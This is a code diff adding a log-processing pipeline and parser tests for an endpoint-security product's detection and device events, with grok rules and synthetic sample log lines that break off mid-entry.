Timestamp: %{PARSE_TILL_COMMA2:event_timestamp}, Event Received + Timestamp: %{PARSE_TILL_COMMA2:event_received_timestamp}, Device + Last Reported Users: + %{data:device_last_reported_users:array("()",",")}, Zone Ids: + %{notSpace:zone_ids}, Detection Rule Id: + (%{notSpace:detection_rule_id})?, Instigating Process Command + Line: %{PARSE_TILL_COMMA:instigating_process_command_line}, + Instigating Process File Path: + %{PARSE_TILL_COMMA2:instigating_process_file_path}, Consumer Text: + %{PARSE_TILL_COMMA2:consumer_text}, Consumer Text Length: + (%{integer:consumer_text_length})?, Operation: + %{PARSE_TILL_COMMA2:operation}, Operation Length: + (%{integer:operation_length})?, Device Id: + (%{notSpace:device_id})?' + - type: pipeline + name: Processing Aurora Focus API Sensor Based Detection Events + enabled: true + filter: + query: "@evt.name:OpticsCaeApiEvent" + processors: + - type: grok-parser + name: Parsing Aurora Focus API Sensor Based Detection Events + enabled: true + source: additional_details + samples: + - "Device Name: SECURITYSERVER3, Zone Names: (ZoneOne,ZoneTwo), + Event Id: d29ee101-a2a2-42f1-b9ab-7e4b18aeeef1, Severity: High, + Description: Test - API Sensor, High priority event, Instigating + Process Name: IReadCredentials.exe, Instigating Process Owner: + PENTEST//Administrator, Instigating Process ImageFileSha256: + E24F5A2B51EC1C260388348AF764B8794CE0566749F5801D024B7B422C63DC56, + Event Timestamp: 2022-09-28T14:23:37.384Z, Event Received + Timestamp: 2022-09-28T14:24:30Z, Device Last Reported Users: + (PENTEST\\Administrator), Zone Ids: + (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CA\ + A), Detection Rule Id: be7403ca-a9f4-4aa7-ad6d-7c672bfa8fc9, + Instigating Process Command Line: IReadCredentials.exe, + Instigating Process File Path: + c:\\apisensor\\ireadcredentials.exe, API DLL: Advapi32.dll, API + Function: CredEnumerateW, API Parameters: Unknown" + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + 
PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_api_rule Device Name: %{PARSE_TILL_COMMA2:device_name}, Zone + Names: %{data:zone_names}, Event Id: (%{notSpace:event_id})?, + Severity: (%{notSpace:severity})?, Description: + %{PARSE_TILL_COMMA:description}, Instigating Process Name: + %{PARSE_TILL_COMMA2:instigating_process_name}, Instigating Process + Owner: %{PARSE_TILL_COMMA2:instigating_process_owner}, Instigating + Process ImageFileSha256: + (%{notSpace:instigating_process_imagefilesha256})?, Event + Timestamp: %{PARSE_TILL_COMMA2:event_timestamp}, Event Received + Timestamp: %{PARSE_TILL_COMMA2:event_received_timestamp}, Device + Last Reported Users: + %{data:device_last_reported_users:array("()",",")}, Zone Ids: + %{notSpace:zone_ids}, Detection Rule Id: + (%{notSpace:detection_rule_id})?, Instigating Process Command + Line: %{PARSE_TILL_COMMA2:instigating_process_command_line}, + Instigating Process File Path: + %{PARSE_TILL_COMMA2:instigating_process_file_path}, API DLL: + %{PARSE_TILL_COMMA2:api_dll}, API Function: + %{PARSE_TILL_COMMA2:api_function}, API Parameters: + %{regex("[^$]*"):api_parameters}' + - type: pipeline + name: Processing Aurora Focus COM Based Detection Events + enabled: true + filter: + query: "@event_type:OpticsCaeComEvent" + processors: + - type: grok-parser + name: Parsing Aurora Focus COM Based Detection Events + enabled: true + source: additional_details + samples: + - 'Device Name: DEVICE-W19, Zone Names: (Zone_3.x), Event Id: + 9e5ac116-a20c-4929-9087-10fd7fdcb105, Severity: High, Description: + Device - Application COM Event, Instigating Process Name: + GoogleUpdate.exe, Instigating Process Owner: NT AUTHORITY//SYSTEM, + Instigating Process ImageFileSha256: + 63854E78780866D2AE56A58958A1FDA017A71F54B71FE70CF5403958E961862A, + Event Timestamp: 2023-08-23T07:28:59.588Z, Event Received + Timestamp: 2023-08-23T07:29:01Z, Device Last Reported Users: + (Window Manager\DWM-1), Zone Ids: + (D215191148D64DEE826768B62D64B244), 
Detection Rule Id: + 15b11fa2-fc61-4aa3-aa04-082c488f8a86, Instigating Process Command + Line: "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" + /svc, Instigating Process File Path: c:\program files + (x86)\google\update\googleupdate.exe, COM Interface ID: + 2933bf81-7b36-11d2-b20e-00c04f983e60, COM Program: msxml, COM + Interface: IXMLDOMDocument, Device Id: + 744ac660-9704-4edb-a8d0-ae13a343f3bf' + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_com_rule Device Name: %{PARSE_TILL_COMMA2:device_name}, Zone + Names: %{PARSE_TILL_COMMA:zone_names}, Event Id: + (%{notSpace:event_id})?, Severity: (%{notSpace:severity})?, + Description: %{PARSE_TILL_COMMA2:description}, Instigating Process + Name: %{PARSE_TILL_COMMA2:instigating_process_name}, Instigating + Process Owner: %{PARSE_TILL_COMMA2:instigating_process_owner}, + Instigating Process ImageFileSha256: + (%{notSpace:instigating_process_imagefilesha256})?, Event + Timestamp: %{PARSE_TILL_COMMA2:event_timestamp}, Event Received + Timestamp: %{PARSE_TILL_COMMA2:event_received_timestamp}, Device + Last Reported Users: + %{data:device_last_reported_users:array("()",",")}, Zone Ids: + %{notSpace:zone_ids}, Detection Rule Id: + (%{notSpace:detection_rule_id})?, Instigating Process Command + Line: %{PARSE_TILL_COMMA:instigating_process_command_line}, + Instigating Process File Path: + %{PARSE_TILL_COMMA2:instigating_process_file_path}, COM Interface + ID: %{PARSE_TILL_COMMA2:com_interface_id}, COM Program: + %{PARSE_TILL_COMMA2:com_program}, COM Interface: + %{PARSE_TILL_COMMA2:com_interface}, Device Id: + (%{notSpace:device_id})?' 
+ - type: pipeline + name: Processing of Aurora Focus HTTP Visibility Detection Events + enabled: true + filter: + query: "@event_type:OpticsCaeHttpEvent" + processors: + - type: grok-parser + name: Parsing Aurora Focus HTTP Visibility Detection Events + enabled: true + source: additional_details + samples: + - "Device Name: DEVICE-W19, Zone Names: (Zone_3.x), Event Id: + 41ea5ce4-6501-4c13-a7a2-80f9afec9eee, Severity: High, Description: + DEVICE - Trigger on ANY http sensor event, Instigating Process + Name: svchost.exe, Instigating Process Owner: NT + AUTHORITY//SYSTEM, Instigating Process ImageFileSha256: + 2B105FB153B1BCD619B95028612B3A93C60B953EEF6837D3BB0099E4207AAF6B, + Event Timestamp: 2023-08-23T15:48:52.992Z, Event Received + Timestamp: 2023-08-23T15:48:57Z, Device Last Reported Users: + (RIMNET\\adminuser,Window Manager\\DWM-1,Window Manager\\DWM-2), + Zone Ids: (D215191148D64DEE826768B62D64B244), Detection Rule Id: + 9a82a2d3-e6b0-4177-9bac-80ba5b1ef982, Instigating Process Command + Line: C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s wlidsvc, + Instigating Process File Path: c:\\windows\\system32\\svchost.exe, + Device Id: 744ac660-9704-4edb-a8d0-ae13a343f3bf, User Agent: + Microsoft-CryptoAPI/10.0, Request Domain: ocsp.digicert.com, + Request Path: + /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA9\ + 5QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D, Request + Method: GET, Request Port: 80, Request Version: HTTP/1.1, Request + Headers: 0, Request Length: 0, Response Status: 0, Response + Headers: 0, Response Length: 0" + grok: + supportRules: |- + PARSE_TILL_COMMA %{regex("(.*)(?=,)")} + PARSE_TILL_COMMA2 %{regex("[^,]*")} + matchRules: 'parse_http_rule Device Name: %{PARSE_TILL_COMMA2:device_name}, Zone + Names: %{PARSE_TILL_COMMA:zone_names}, Event Id: + (%{notSpace:event_id})?, Severity: (%{notSpace:severity})?, + Description: %{PARSE_TILL_COMMA2:description}, Instigating Process + Name: 
%{PARSE_TILL_COMMA2:instigating_process_name}, Instigating + Process Owner: %{PARSE_TILL_COMMA2:instigating_process_owner}, + Instigating Process ImageFileSha256: + (%{notSpace:instigating_process_imagefilesha256})?, Event + Timestamp: %{PARSE_TILL_COMMA2:event_timestamp}, Event Received + Timestamp: %{PARSE_TILL_COMMA2:event_received_timestamp}, Device + Last Reported Users: + %{data:device_last_reported_users:array("()",",")}, Zone Ids: + %{notSpace:zone_ids}, Detection Rule Id: + (%{notSpace:detection_rule_id})?, Instigating Process Command + Line: %{PARSE_TILL_COMMA:instigating_process_command_line}, + Instigating Process File Path: + %{PARSE_TILL_COMMA2:instigating_process_file_path}, Device Id: + (%{notSpace:device_id})?, User Agent: + %{PARSE_TILL_COMMA2:http.useragent}, Request Domain: + %{PARSE_TILL_COMMA2:dns.question.name}, Request Path: + %{PARSE_TILL_COMMA2:request_path}, Request Method: + (%{notSpace:request_method})?, Request Port: + (%{port:request_port})?, Request Version: + %{PARSE_TILL_COMMA2:request_version}, Request Headers: + %{PARSE_TILL_COMMA2:request_headers}, Request Length: + (%{integer:request_length})?, Response Status: + %{PARSE_TILL_COMMA2:response_status}, Response Headers: + %{PARSE_TILL_COMMA2:response_headers}, Response Length: + (%{integer:response_length})?' 
+ - type: user-agent-parser
+ name: Parsing `http.useragent`
+ enabled: true
+ sources:
+ - http.useragent
+ target: http.useragent_details
+ encoded: false
+ combineVersionDetails: false
+ - type: pipeline
+ name: Processing Aurora Focus Detection Events
+ enabled: true
+ filter:
+ query: service:detection-events
+ processors:
+ - name: Lookup on `severity` to `status`
+ enabled: true
+ source: severity
+ target: status
+ lookupTable: |-
+ High,critical
+ Medium,warning
+ Low,info
+ Info,info
+ Informational,info
+ type: lookup-processor
+ - type: status-remapper
+ name: Define `status` as the official status of the log
+ enabled: true
+ sources:
+ - status
+ - type: string-builder-processor
+ name: Reset `additional_details` attribute
+ enabled: true
+ template: "%{resolve_to_empty_string}"
+ target: additional_details
+ replaceMissing: true
diff --git a/arctic_wolf_aurora_endpoint_security/assets/logs/arctic-wolf-aurora-endpoint-security_tests.yaml b/arctic_wolf_aurora_endpoint_security/assets/logs/arctic-wolf-aurora-endpoint-security_tests.yaml
new file mode 100644
index 0000000000000..356403b6ab514
--- /dev/null
+++ b/arctic_wolf_aurora_endpoint_security/assets/logs/arctic-wolf-aurora-endpoint-security_tests.yaml
@@ -0,0 +1,680 @@
+id: "arctic-wolf-aurora-endpoint-security"
+tests:
+ -
+ sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: AppControl, Event Name: pechange, Device Name: Unknown (test1), IP Address: (10.0.0.0), Action: Deny, Action Type: PE File Change, File Path: c:/test/test1, SHA256: 7D2113B7046867BC643CD621D2CBA7365609675505BAA66585FC44747C0D1EF5, Zone Names: (Windows Zone (Default)), Device Id: 0929f443-2a56-46b3-bcfe-fc598da81d8a, Policy Name: Stage 3 - All Threats AQT + Critical Exploit Prevention + Malicious Script Prevention (Cylance Reference Policy)"
+ result:
+ custom:
+ action: "Deny"
+ action_type: "PE File Change"
+ additional_details: ""
+ device_id: "0929f443-2a56-46b3-bcfe-fc598da81d8a"
+ device_name: "Unknown (test1)"
+ event_type: "AppControl"
+ evt:
+ name: "pechange"
+ file_path: "c:/test/test1"
+ ip_addresses:
+ - "10.0.0.0"
+ policy_name: "Stage 3 - All Threats AQT + Critical Exploit Prevention + Malicious Script Prevention (Cylance Reference Policy)"
+ service: "desktop-events"
+ sha256: "7D2113B7046867BC643CD621D2CBA7365609675505BAA66585FC44747C0D1EF5"
+ tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7"
+ tenant_name: "TestTenant"
+ zone_names: "(Windows Zone (Default))"
+ message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: AppControl, Event Name: pechange, Device Name: Unknown (test1), IP Address: (10.0.0.0), Action: Deny, Action Type: PE File Change, File Path: c:/test/test1, SHA256: 7D2113B7046867BC643CD621D2CBA7365609675505BAA66585FC44747C0D1EF5, Zone Names: (Windows Zone (Default)), Device Id: 0929f443-2a56-46b3-bcfe-fc598da81d8a, Policy Name: Stage 3 - All Threats AQT + Critical Exploit Prevention + Malicious Script Prevention (Cylance Reference Policy)"
+ service: "desktop-events"
+ tags:
+ - "source:LOGS_SOURCE"
+ timestamp: 1
+ -
+ sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: AuditLog, Event 
Name: LoginSuccess, Message: Provider: CylancePROTECT, Source IP: 163.116.205.119, User: John Carter (john.carter@example.com)"
+ result:
+ custom:
+ additional_details: ""
+ event_type: "AuditLog"
+ evt:
+ name: "LoginSuccess"
+ message: "Provider: CylancePROTECT, Source IP: 163.116.205.119"
+ service: "desktop-events"
+ tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7"
+ tenant_name: "TestTenant"
+ user: "John Carter (john.carter@example.com)"
+ message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: AuditLog, Event Name: LoginSuccess, Message: Provider: CylancePROTECT, Source IP: 163.116.205.119, User: John Carter (john.carter@example.com)"
+ service: "desktop-events"
+ tags:
+ - "source:LOGS_SOURCE"
+ timestamp: 1
+ -
+ sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: Device, Event Name: Registration, Device Name: AssetTag-EID, Zone Names: (zone1,zone2), Device Id: b1f8e376-cee3-4319-a076-f587c51e68ac"
+ result:
+ custom:
+ additional_details: ""
+ device_id: "b1f8e376-cee3-4319-a076-f587c51e68ac"
+ device_name: "AssetTag-EID"
+ event_type: "Device"
+ evt:
+ name: "Registration"
+ service: "desktop-events"
+ tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7"
+ tenant_name: "TestTenant"
+ zone_names: "(zone1,zone2)"
+ message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: Device, Event Name: Registration, Device Name: AssetTag-EID, Zone Names: (zone1,zone2), Device Id: b1f8e376-cee3-4319-a076-f587c51e68ac"
+ service: "desktop-events"
+ tags:
+ - "source:LOGS_SOURCE"
+ timestamp: 1
+ -
+ sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeComEvent, Event Name: OpticsCaeComEvent, Device Name: DEVICE-W19, Zone Names: (Zone_3.x), Event Id: 9e5ac116-a20c-4929-9087-10fd7fdcb105, Severity: High, Description: Device - Application COM Event, Instigating Process Name: GoogleUpdate.exe, Instigating 
Process Owner: NT AUTHORITY//SYSTEM, Instigating Process ImageFileSha256: 63854E78780866D2AE56A58958A1FDA017A71F54B71FE70CF5403958E961862A, Event Timestamp: 2023-08-23T07:28:59.588Z, Event Received Timestamp: 2023-08-23T07:29:01Z, Device Last Reported Users: (Window Manager\\DWM-1), Zone Ids: (D215191148D64DEE826768B62D64B244), Detection Rule Id: 15b11fa2-fc61-4aa3-aa04-082c488f8a86, Instigating Process Command Line: \"C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe\" /svc, Instigating Process File Path: c:\\program files (x86)\\google\\update\\googleupdate.exe, COM Interface ID: 2933bf81-7b36-11d2-b20e-00c04f983e60, COM Program: msxml, COM Interface: IXMLDOMDocument, Device Id: 744ac660-9704-4edb-a8d0-ae13a343f3bf" + result: + custom: + additional_details: "" + com_interface: "IXMLDOMDocument" + com_interface_id: "2933bf81-7b36-11d2-b20e-00c04f983e60" + com_program: "msxml" + description: "Device - Application COM Event" + detection_rule_id: "15b11fa2-fc61-4aa3-aa04-082c488f8a86" + device_id: "744ac660-9704-4edb-a8d0-ae13a343f3bf" + device_last_reported_users: + - "Window Manager\\DWM-1" + device_name: "DEVICE-W19" + event_id: "9e5ac116-a20c-4929-9087-10fd7fdcb105" + event_received_timestamp: "2023-08-23T07:29:01Z" + event_timestamp: "2023-08-23T07:28:59.588Z" + event_type: "OpticsCaeComEvent" + evt: + name: "OpticsCaeComEvent" + instigating_process_command_line: "\"C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe\" /svc" + instigating_process_file_path: "c:\\program files (x86)\\google\\update\\googleupdate.exe" + instigating_process_imagefilesha256: "63854E78780866D2AE56A58958A1FDA017A71F54B71FE70CF5403958E961862A" + instigating_process_name: "GoogleUpdate.exe" + instigating_process_owner: "NT AUTHORITY//SYSTEM" + service: "detection-events" + severity: "High" + status: "critical" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + zone_ids: "(D215191148D64DEE826768B62D64B244)" + zone_names: "(Zone_3.x)" + 
message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeComEvent, Event Name: OpticsCaeComEvent, Device Name: DEVICE-W19, Zone Names: (Zone_3.x), Event Id: 9e5ac116-a20c-4929-9087-10fd7fdcb105, Severity: High, Description: Device - Application COM Event, Instigating Process Name: GoogleUpdate.exe, Instigating Process Owner: NT AUTHORITY//SYSTEM, Instigating Process ImageFileSha256: 63854E78780866D2AE56A58958A1FDA017A71F54B71FE70CF5403958E961862A, Event Timestamp: 2023-08-23T07:28:59.588Z, Event Received Timestamp: 2023-08-23T07:29:01Z, Device Last Reported Users: (Window Manager\\DWM-1), Zone Ids: (D215191148D64DEE826768B62D64B244), Detection Rule Id: 15b11fa2-fc61-4aa3-aa04-082c488f8a86, Instigating Process Command Line: \"C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe\" /svc, Instigating Process File Path: c:\\program files (x86)\\google\\update\\googleupdate.exe, COM Interface ID: 2933bf81-7b36-11d2-b20e-00c04f983e60, COM Program: msxml, COM Interface: IXMLDOMDocument, Device Id: 744ac660-9704-4edb-a8d0-ae13a343f3bf" + service: "detection-events" + status: "critical" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeHttpEvent, Event Name: OpticsCaeHttpEvent, Device Name: DEVICE-W19, Zone Names: (Zone_3.x), Event Id: 41ea5ce4-6501-4c13-a7a2-80f9afec9eee, Severity: High, Description: DEVICE - Trigger on ANY http sensor event, Instigating Process Name: svchost.exe, Instigating Process Owner: NT AUTHORITY//SYSTEM, Instigating Process ImageFileSha256: 2B105FB153B1BCD619B95028612B3A93C60B953EEF6837D3BB0099E4207AAF6B, Event Timestamp: 2023-08-23T15:48:52.992Z, Event Received Timestamp: 2023-08-23T15:48:57Z, Device Last Reported Users: (RIMNET\\adminuser,Window Manager\\DWM-1,Window Manager\\DWM-2), Zone Ids: (D215191148D64DEE826768B62D64B244), Detection Rule Id: 9a82a2d3-e6b0-4177-9bac-80ba5b1ef982, 
Instigating Process Command Line: C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s wlidsvc, Instigating Process File Path: c:\\windows\\system32\\svchost.exe, Device Id: 744ac660-9704-4edb-a8d0-ae13a343f3bf, User Agent: Microsoft-CryptoAPI/10.0, Request Domain: ocsp.digicert.com, Request Path: /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D, Request Method: GET, Request Port: 80, Request Version: HTTP/1.1, Request Headers: 0, Request Length: 0, Response Status: 0, Response Headers: 0, Response Length: 0" + result: + custom: + additional_details: "" + description: "DEVICE - Trigger on ANY http sensor event" + detection_rule_id: "9a82a2d3-e6b0-4177-9bac-80ba5b1ef982" + device_id: "744ac660-9704-4edb-a8d0-ae13a343f3bf" + device_last_reported_users: + - "RIMNET\\adminuser" + - "Window Manager\\DWM-1" + - "Window Manager\\DWM-2" + device_name: "DEVICE-W19" + dns: + question: + name: "ocsp.digicert.com" + event_id: "41ea5ce4-6501-4c13-a7a2-80f9afec9eee" + event_received_timestamp: "2023-08-23T15:48:57Z" + event_timestamp: "2023-08-23T15:48:52.992Z" + event_type: "OpticsCaeHttpEvent" + evt: + name: "OpticsCaeHttpEvent" + http: + useragent: "Microsoft-CryptoAPI/10.0" + useragent_details: + browser: + family: "Microsoft-CryptoAPI" + major: "10" + minor: "0" + device: + category: "Other" + family: "Other" + os: + family: "Other" + instigating_process_command_line: "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s wlidsvc" + instigating_process_file_path: "c:\\windows\\system32\\svchost.exe" + instigating_process_imagefilesha256: "2B105FB153B1BCD619B95028612B3A93C60B953EEF6837D3BB0099E4207AAF6B" + instigating_process_name: "svchost.exe" + instigating_process_owner: "NT AUTHORITY//SYSTEM" + request_headers: "0" + request_length: 0 + request_method: "GET" + request_path: "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D" + 
request_port: "80" + request_version: "HTTP/1.1" + response_headers: "0" + response_length: 0 + response_status: "0" + service: "detection-events" + severity: "High" + status: "critical" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + zone_ids: "(D215191148D64DEE826768B62D64B244)" + zone_names: "(Zone_3.x)" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeHttpEvent, Event Name: OpticsCaeHttpEvent, Device Name: DEVICE-W19, Zone Names: (Zone_3.x), Event Id: 41ea5ce4-6501-4c13-a7a2-80f9afec9eee, Severity: High, Description: DEVICE - Trigger on ANY http sensor event, Instigating Process Name: svchost.exe, Instigating Process Owner: NT AUTHORITY//SYSTEM, Instigating Process ImageFileSha256: 2B105FB153B1BCD619B95028612B3A93C60B953EEF6837D3BB0099E4207AAF6B, Event Timestamp: 2023-08-23T15:48:52.992Z, Event Received Timestamp: 2023-08-23T15:48:57Z, Device Last Reported Users: (RIMNET\\adminuser,Window Manager\\DWM-1,Window Manager\\DWM-2), Zone Ids: (D215191148D64DEE826768B62D64B244), Detection Rule Id: 9a82a2d3-e6b0-4177-9bac-80ba5b1ef982, Instigating Process Command Line: C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s wlidsvc, Instigating Process File Path: c:\\windows\\system32\\svchost.exe, Device Id: 744ac660-9704-4edb-a8d0-ae13a343f3bf, User Agent: Microsoft-CryptoAPI/10.0, Request Domain: ocsp.digicert.com, Request Path: /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D, Request Method: GET, Request Port: 80, Request Version: HTTP/1.1, Request Headers: 0, Request Length: 0, Response Status: 0, Response Headers: 0, Response Length: 0" + service: "detection-events" + status: "critical" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeMemoryEvent, Event Name: OpticsCaeMemoryEvent, Device Name: 
SECURITYSERVER3, Zone Names: (JeffTesting,Jeff_3.0), Event Id: c4e7d4e1-8739-4996-83a3-19d9ba583882, Severity: Medium, Description: Looking for a protect memory event, Instigating Process Name: AttackTest32.exe, Instigating Process Owner: PENTEST/Administrator, Instigating Process ImageFileSha256: 2762CB5818C67BDD28DFE88FB528EF06B0C1AB5C175E2206B49C85BB8672C2EC, Event Timestamp: 2022-07-21T12:55:02.277Z, Event Received Timestamp: 2022-07-21T12:55:25Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: edf530c6-6b0e-4be2-aeb6-d3f8001fce05, Instigating Process Command Line: AttackTest32.exe -p:8000, Instigating Process File Path: c:\\users\\administrator.pentest\\downloads\\attacktest\\attacktest32.exe, Device Id: e378dacb-9324-453a-b8c6-5a8406952195" + result: + custom: + additional_details: "" + description: "Looking for a protect memory event" + detection_rule_id: "edf530c6-6b0e-4be2-aeb6-d3f8001fce05" + device_id: "e378dacb-9324-453a-b8c6-5a8406952195" + device_last_reported_users: + - "PENTEST\\Administrator" + device_name: "SECURITYSERVER3" + event_id: "c4e7d4e1-8739-4996-83a3-19d9ba583882" + event_received_timestamp: "2022-07-21T12:55:25Z" + event_timestamp: "2022-07-21T12:55:02.277Z" + event_type: "OpticsCaeMemoryEvent" + evt: + name: "OpticsCaeMemoryEvent" + instigating_process_command_line: "AttackTest32.exe -p:8000" + instigating_process_file_path: "c:\\users\\administrator.pentest\\downloads\\attacktest\\attacktest32.exe" + instigating_process_imagefilesha256: "2762CB5818C67BDD28DFE88FB528EF06B0C1AB5C175E2206B49C85BB8672C2EC" + instigating_process_name: "AttackTest32.exe" + instigating_process_owner: "PENTEST/Administrator" + service: "detection-events" + severity: "Medium" + status: "warning" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + zone_ids: "(F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA)" + 
zone_names: "(JeffTesting,Jeff_3.0)" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: OpticsCaeMemoryEvent, Event Name: OpticsCaeMemoryEvent, Device Name: SECURITYSERVER3, Zone Names: (JeffTesting,Jeff_3.0), Event Id: c4e7d4e1-8739-4996-83a3-19d9ba583882, Severity: Medium, Description: Looking for a protect memory event, Instigating Process Name: AttackTest32.exe, Instigating Process Owner: PENTEST/Administrator, Instigating Process ImageFileSha256: 2762CB5818C67BDD28DFE88FB528EF06B0C1AB5C175E2206B49C85BB8672C2EC, Event Timestamp: 2022-07-21T12:55:02.277Z, Event Received Timestamp: 2022-07-21T12:55:25Z, Device Last Reported Users: (PENTEST\\Administrator), Zone Ids: (F568A8A8E401470282C1FE98FDD1703C,161EB91D79D6466A80182CF685FA7CAA), Detection Rule Id: edf530c6-6b0e-4be2-aeb6-d3f8001fce05, Instigating Process Command Line: AttackTest32.exe -p:8000, Instigating Process File Path: c:\\users\\administrator.pentest\\downloads\\attacktest\\attacktest32.exe, Device Id: e378dacb-9324-453a-b8c6-5a8406952195" + service: "detection-events" + status: "warn" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: Device, Event Name: Device Updated, Device Message: Renamed: 'default' to 'Unknown', User: John Carter (john.carter@example.com), Zone Names: (Windows Zone (Default)), Device Id: 4755134a-9eb4-44d1-95f3-aa605d4443cf" + result: + custom: + additional_details: "" + device_id: "4755134a-9eb4-44d1-95f3-aa605d4443cf" + device_name: "Unknown" + event_type: "Device" + evt: + name: "Device Updated" + previous_device: "default" + service: "desktop-events" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + user: "John Carter (john.carter@example.com)" + zone_names: "(Windows Zone (Default))" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: Device, Event Name: 
Device Updated, Device Message: Renamed: 'default' to 'Unknown', User: John Carter (john.carter@example.com), Zone Names: (Windows Zone (Default)), Device Id: 4755134a-9eb4-44d1-95f3-aa605d4443cf" + service: "desktop-events" + tags: + - "source:LOGS_SOURCE" + timestamp: 1 + - + sample: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: DeviceControl, Event Name: blocked, Device Name: Unknown CLW 381, External Device Type: USBDrive, External Device Vendor ID: 090S, External Device Name: USB Flash DISK USB Device, External Device Product ID: 1001, External Device Serial Number: 1408033910001649, Zone Names: (Windows Zone (Default)), Device Id: cf753b5b-6ce6-4648-b2df-a827d3560b6q, Policy Name: Stage 3 - All Threats AQT + Critical Exploit Prevention + Malicious Script Prevention (Cylance Reference Policy)" + result: + custom: + additional_details: "" + device_id: "cf753b5b-6ce6-4648-b2df-a827d3560b6q" + device_name: "Unknown CLW 381" + event_type: "DeviceControl" + evt: + name: "blocked" + external_device_name: "USB Flash DISK USB Device" + external_device_product_id: "1001" + external_device_serial_number: "1408033910001649" + external_device_type: "USBDrive" + external_device_vendor_id: "090S" + policy_name: "Stage 3 - All Threats AQT + Critical Exploit Prevention + Malicious Script Prevention (Cylance Reference Policy)" + service: "desktop-events" + tenant_id: "82ee77a2-76a6-4d8f-97de-231bd4d5a4f7" + tenant_name: "TestTenant" + zone_names: "(Windows Zone (Default))" + message: "Tenant ID: 82ee77a2-76a6-4d8f-97de-231bd4d5a4f7, Tenant Name: TestTenant, Event Type: DeviceControl, Event Name: blocked, Device Name: Unknown CLW 381, External Device Type: USBDrive, External Device Vendor ID: 090S, External Device Name: USB Flash DISK USB Device, External Device Product ID: 1001, External Device Serial Number: 1408033910001649, Zone Names: (Windows Zone (Default)), Device Id: cf753b5b-6ce6-4648-b2df-a827d3560b6q, Policy Name: Stage 3 - 
